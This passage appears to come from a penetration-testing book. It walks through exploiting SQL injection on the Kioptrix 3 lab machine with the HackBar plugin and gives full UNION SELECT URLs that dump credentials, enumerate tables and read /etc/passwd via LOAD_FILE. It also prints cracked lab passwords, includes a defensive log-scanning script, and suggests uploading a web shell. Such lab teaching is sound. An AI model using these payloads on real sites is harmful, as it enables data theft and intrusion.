Introduction to browser plugin HackBar

The Iceweasel browser provides penetration testers with a myriad of tools that make web application testing efficient and fun, taking advantage of the many browser plugins that have been written over the years. We will use the HackBar plugin within Iceweasel to fully exploit the Kioptrix 3 machine in our lab in an efficient manner. You can learn more about HackBar at https://addons.mozilla.org/en-US/firefox/addon/hackbar/. The HackBar and other add-ons that can be installed in Iceweasel make testing web applications enjoyable and allow a knowledgeable penetration tester to manually verify the security of a web application.

Open the Iceweasel browser and click on Open menu | Add-ons, located on the right-hand side of the screen next to the home icon. In the Search all add-ons field, enter HackBar and search for the tool; once it is found, install it and restart the browser:

  1. Using the HackBar in Iceweasel, enter the following URL and click on the Execute button:
    http://kioptrix3.com/gallery/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6+from+gallarific_users--
  2. You should be presented with the username admin and the password n0t7t1k4.
  3. Let's take a look at how we can get other information. Enter the following into the HackBar: http://kioptrix3.com/gallery/gallery.php?id=1 and click on Execute.
  4. Now, place the cursor at the end of the http://kioptrix3.com/gallery/gallery.php?id=1 entry in the HackBar, add a space, and then click on SQL | Union Select Statement directly above the HackBar and enter 6 in the pop-up that appears. Then, click on OK. Click on the HackBar Execute button to verify that the SQL injection works.
  5. Now, replace the number 2 in the query that was generated by highlighting it and clicking on SQL | MySQL | Basic Info Column, so that your URL now looks like this: http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),@@version),3,4,5,6. Click on Execute on the HackBar and review the results. The output should contain the following information: root@localhost:gallery:5.0.51a-3ubuntu5.4. You have successfully enumerated the user, the database name, and the version that are running.
  6. At this point, you can use any of the typical SQL injection tricks to enumerate this database. Try running different commands such as http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database(), which will list all of the tables from the current database.
  7. We can also read certain files on the server using commonly used SQL injection code such as http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5,6. This will display the contents of the server's password file.
  8. To pull the development user's account information, we can use http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,username,password,4,5,6 from dev_accounts, which provides us with the information for the username loneferret, with a password hash value of 5badcaf789d3d1d09794d8f021f40f0e, and the user dreg, with a password hash of 0d3eccfb887aabd50f243b3f155c0f85. We can try to crack these user passwords. Successfully cracking the passwords will provide you with the following credentials: dreg - Mast3r and loneferret - starwars.
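
As an added defender's-side example (not from the original chapter, and not HackBar or Kioptrix code), the following Python scans constructed Apache access-log lines carrying the same gallery.php requests the steps above send, decodes each query value as the server would, and flags the UNION SELECT, information_schema, LOAD_FILE and fingerprinting tokens; the client IPs and timestamps are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-log lines (hypothetical client IPs and timestamps)
# carrying the same gallery.php requests the HackBar steps above send.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2015:10:01:02 +0000] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:10:01:30 +0000] "GET /gallery/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6+from+gallarific_users-- HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:10:02:11 +0000] "GET /gallery/gallery.php?id=1%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),@@version),3,4,5,6 HTTP/1.1" 200 5310 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:10:02:50 +0000] "GET /gallery/gallery.php?id=1%20UNION%20SELECT%201,table_name,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 5400 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:10:03:45 +0000] "GET /gallery/gallery.php?id=1%20UNION%20SELECT%201,LOAD_FILE('/etc/passwd'),3,4,5,6 HTTP/1.1" 200 6000 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2015:10:04:00 +0000] "GET /gallery/photos.php?id=12 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One rule per technique the walkthrough uses, matched against the decoded value.
RULES = {
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),  # needs the MySQL FILE privilege
    "fingerprint": re.compile(r"@@version|\b(?:user|database)\s*\(\s*\)", re.I),
    "comment_terminator": re.compile(r"(?:--|/\*)\s*$"),
}

def decode_params(target):
    """Decode each query value as the server would; the second pass catches
    double-encoded input that a single decode leaves untouched."""
    query = urlsplit(target).query
    return {k: unquote_plus(v) for k, v in parse_qsl(query, keep_blank_values=True)}

def classify(line):
    """Parse one log line; return None if it is not a combined-log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = [(param, rule)
            for param, value in decode_params(m["target"]).items()
            for rule, rx in RULES.items() if rx.search(value)]
    return {"ip": m["ip"], "ts": m["ts"], "path": urlsplit(m["target"]).path, "hits": hits}

def scan(log_text):
    """Return one record per request that tripped at least one rule."""
    return [rec for rec in map(classify, log_text.splitlines())
            if rec and rec["hits"]]
```

A file_read hit deserves its own alert: LOAD_FILE only returns data when the application's MySQL account holds the FILE privilege, which the least-privilege fix removes alongside parameterising the id lookup.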

These users have fallen into the pitfall of reusing passwords. You can log on to the Kioptrix 1.2 machine in your lab now by opening an SSH session from your Kali machine to the Kioptrix machine. Luckily, these accounts are not in the sudoers list. Now, we need to elevate the privilege of one of the accounts.

Tip

At this point, you are almost at root on the Kioptrix Level 1.2 machine. Take your time, look around the server and try to figure out a method of escalating the privilege of either user.

Once you have gained root using SSH, challenge yourself again by uploading a shell to the Kioptrix Level 1.2 machine using nothing but the website! There are several different methods of accomplishing this; if you get stuck, take a look at one of the many walkthroughs on the Web.
